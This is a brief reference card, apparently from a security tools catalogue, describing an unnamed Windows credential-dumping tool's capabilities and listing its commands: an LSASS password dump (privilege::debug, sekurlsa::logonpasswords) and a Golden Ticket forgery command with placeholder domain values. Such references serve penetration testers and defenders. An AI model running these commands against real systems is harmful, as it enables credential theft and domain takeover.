// what it is
Description
Dumps NTLM hashes, Kerberos tickets, plaintext passwords from LSASS; forges Golden and Silver tickets; performs Pass-the-Hash and Pass-the-Ticket. Released in 2007 'as an educational tool' — single-handedly invented modern Windows credential tradecraft.
// use cases
What people use it for
- Dump cached credentials from LSASS
- Forge Golden Tickets
- Extract Kerberos tickets for Pass-the-Ticket
// commands
The commands you'll type
Enable debug + dump
$ privilege::debug
sekurlsa::logonpasswordsGolden ticket
$ kerberos::golden /user:Administrator /domain:corp.local /sid:S-1-5-... /krbtgt:<hash> /ptt